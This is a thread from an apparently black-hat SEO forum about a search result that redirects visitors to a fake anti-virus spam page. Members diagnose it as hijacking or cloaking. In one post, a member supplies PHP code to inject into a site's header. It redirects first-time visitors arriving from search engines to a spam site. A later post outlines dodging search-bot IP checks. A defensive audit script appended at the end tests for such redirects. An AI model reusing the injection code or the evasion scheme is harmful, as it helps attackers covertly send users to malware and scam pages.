
Google got tricked? Please help!!

Discussion in 'Black Hat SEO' started by vivianrollins, Jan 6, 2009.

  1. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    This is really strange so any input on how this is being done would be greatly appreciated. Go to Google and search for "moto euro" and you will see www.moto-euro.com as the #1 listing. DO NOT CLICK THIS LISTING YET.

    Go and type in the URL and you will find yourself on the real moto euro site. However, if you click on the listing from Google's SERP you will be directed to a SPAM site regarding anti-virus. Do NOT click OK or Cancel to the pop-up. Just click the X because I think clicking OK or Cancel might install malware on your PC - not sure but why take a chance.

    How is this possible? How is this being done? Can you imagine the ramifications if CNN or Yahoo were 'hacked' like this?... Although this is an exaggeration, given that these two are bigger and their techs will fix this, there are so many manipulations you can do with this 'trick'.
     
  2. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    This is something interesting, but I don't think Google got hacked or tricked, but probably
    Code:
    www.moto-euro.com
    has been.
     
    Last edited: Jan 6, 2009
  3. antsaoo

    antsaoo Supreme Member

    Joined:
    Oct 1, 2008
    Messages:
    1,292
    Likes Received:
    637
    Yup, gives the same thingy with Yahoo and MSN o_0, bet someone hacked their site and put some funny things on there :)
     
  4. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    Yep, the link in Google also points to the right site.
     
  5. Jagged55

    Jagged55 Power Member

    Joined:
    Mar 27, 2008
    Messages:
    747
    Likes Received:
    325
    Occupation:
    Internet Marketing
    Location:
    Canada
    The link works fine for me...same site if I click the link or type it in.

    Edit: The malware warning comes up in IE, not Firefox
     
  6. kandor

    kandor Regular Member

    Joined:
    May 26, 2008
    Messages:
    274
    Likes Received:
    97
    Sounds like a 302 or 301 hijack.

    kandor
     
  7. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    How is this possible, given that Google's SERP is listing the right URL, but when you click on the SERP listing from Google that is when you get sent to a different URL?

    Clearly when you type in the URL as displayed on SERPs you are being redirected. If the site is hacked then why is it that when you go to the site directly you land on their real site?
     
  8. Jagged55

    Jagged55 Power Member

    Joined:
    Mar 27, 2008
    Messages:
    747
    Likes Received:
    325
    Occupation:
    Internet Marketing
    Location:
    Canada
    Just a guess would be that if regular members had the site bookmarked, they wouldn't want to tip them off about the fact that they were dropping adware on people. If the referrer is from Google, someone is just searching for them for the 1st time (in theory).
     
  9. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    Thanks Kandor. This is most likely it.
     
  10. mrtornado

    mrtornado Power Member

    Joined:
    Dec 16, 2008
    Messages:
    501
    Likes Received:
    530
    Yeah, in theory it redirects you only if the referrer comes from Google.
     
  11. kandor

    kandor Regular Member

    Joined:
    May 26, 2008
    Messages:
    274
    Likes Received:
    97
    And the only way to come out of a 301 or 302 hijacking is to get more links than the offending site.

    Kandor
     
  12. Ramage

    Ramage Registered Member

    Joined:
    Apr 9, 2008
    Messages:
    94
    Likes Received:
    82
    Location:
    New Zealand
    Code:
    www.clsc.net/research/google-302-page-hijack.htm
    More info there
    Read "The technical part: How it is done" section.
    I'm surprised it isn't fixed already considering how the exploit was found 4 years ago.
     
  13. vivianrollins

    vivianrollins Regular Member

    Joined:
    May 13, 2008
    Messages:
    211
    Likes Received:
    98
    Thanks - already read it and yes I'm also shocked that SEs have not addressed this flaw within their own code.

    Scarier is that this can happen w/o intent on both parties and no recourse to resolve.

    Thanks all for contributing. I know I can count on my bro and sis at BHW.

    Cheers
     
  14. Sweetfunny

    Sweetfunny Jr. VIP Jr. VIP

    Joined:
    Jul 13, 2008
    Messages:
    1,779
    Likes Received:
    5,061
    Location:
    ScrapeBox v2.0
    You inject code something like this in the top of the header:

    Code:
    <?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
    
    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
    
    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://www.spamsite.com"); exit; }?>
    
    This will redirect first time visitors coming from the major traffic sources, but not redirect others.
     
  15. benzole

    benzole Newbie

    Joined:
    Dec 14, 2008
    Messages:
    8
    Likes Received:
    2
    Is it a BLACK HAT board? :) I can't believe you guys haven't heard of http://en.wikipedia.org/wiki/Cloaking
    (btw there's probably not just referer cloaking. It's very easy for search engines' bots to catch that type of redirect.)

    I think the scheme is:

    1. Check the referer
    if the referer is good /google, live, yahoo etc/
    then
    2. Check the IP /it should not be in the SE bots' base/
    if IP is not in base - go f*ck this user as you want.
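
As an added example (not part of any post in this thread): a site owner can check their own site for the referrer-and-cookie condition described in post 14 by requesting the same URL with different headers and comparing the answers. The probe names, `simulated_site`, `clean_site` and the `example.com` / `spam.example` hosts are constructed for illustration.

```python
import urllib.error
import urllib.request
from urllib.parse import urlparse

SEARCH_REFERER = "https://www.google.com/search?q=example"  # constructed value

# Header sets to compare: typed-in visit, search click, returning search visitor.
PROBES = {
    "direct": {},
    "search": {"Referer": SEARCH_REFERER},
    "search+cookie": {"Referer": SEARCH_REFERER, "Cookie": "seen=1"},
}

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow; urllib then raises HTTPError for the 3xx

def http_fetch(url, headers):
    """Return (status, Location header) for one GET, without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")

def audit(url, fetch=http_fetch):
    """Return names of probes that are redirected off-site although 'direct' is not."""
    host = urlparse(url).hostname
    results = {name: fetch(url, headers) for name, headers in PROBES.items()}
    def offsite(result):
        status, location = result
        return 300 <= status < 400 and urlparse(location or "").hostname not in (None, host)
    if offsite(results["direct"]):
        return []  # everyone is redirected, so it is not referrer-conditional
    return [name for name, result in results.items() if offsite(result)]

def simulated_site(url, headers):
    """Constructed stand-in for a server behaving as post 14 describes."""
    from_search = "google" in headers.get("Referer", "").lower()
    if from_search and "Cookie" not in headers:
        return 302, "http://spam.example/"
    return 200, None

def clean_site(url, headers):
    """Constructed stand-in for an unaffected server."""
    return 200, None

if __name__ == "__main__":
    print(audit("http://www.example.com/", fetch=simulated_site))
```

A non-empty result means visitors arriving from a search click see something different from visitors who type the URL. Header probes cannot reveal the crawler-IP check suggested in post 15, since that depends on the address the request comes from.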